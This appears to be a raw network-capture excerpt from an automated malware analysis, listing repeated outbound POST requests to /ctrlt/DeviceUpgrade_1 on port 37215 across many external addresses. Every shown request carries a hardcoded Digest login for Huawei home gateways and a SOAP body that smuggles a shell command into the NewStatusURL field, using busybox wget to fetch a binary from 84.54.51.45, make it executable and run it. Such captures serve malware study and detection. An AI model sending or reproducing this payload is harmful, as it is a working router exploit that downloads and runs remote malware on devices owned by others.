                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2516192.168.2.153793641.85.106.3137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.818676949 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2517192.168.2.153298641.165.38.9837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.818708897 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2518192.168.2.155610441.8.225.1037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.818737030 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2519192.168.2.155686241.29.214.20037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.818774939 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2520192.168.2.153617841.170.161.4337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.818799019 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2521192.168.2.153312041.8.199.8637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.818829060 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2522192.168.2.155166041.58.229.22937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.818857908 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2523192.168.2.156048841.6.171.13937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.818881989 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2524192.168.2.153695641.46.69.22037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.818907022 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2525192.168.2.154113041.252.80.11437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.818938017 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 